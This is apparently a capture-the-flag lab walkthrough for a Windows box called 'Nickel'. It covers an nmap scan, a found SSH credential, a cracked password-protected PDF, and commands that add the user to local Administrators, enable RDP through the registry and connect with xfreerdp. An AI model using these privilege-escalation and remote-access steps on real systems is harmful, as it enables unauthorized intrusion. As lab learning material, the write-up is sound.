🪟Nickel

IP: 192.168.66.99

Enumeration

Nmap scan

nmap 192.168.66.99 -p- -sV -Pn

Port 80

Port 3333

Had to get a hint here. All I had to do was add the content length🤦‍♂️

Seems to be a user account ariah:NowiseSloopTheory139 for SSH login.

Shell

Found a file that looks interesting: C:\ftp\Infrastructure.pdf Had to look at how to copy this over since sending it to wwwtree was messing up the file.

PDF is password protected. Cracked it with john.

Tried making a reverse shell with msfvenom here but it kept crashing whenever the shell would come back.

Added ariah to local admin group on the machine and enabled RDP. Both commands had to be URL encoded to send.

net localgroup Administrators ariah /add

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Connected with RDP.

xfreerdp /u:ariah /p:NowiseSloopTheory139 /v:192.168.66.99

Root

Got an admin command prompt.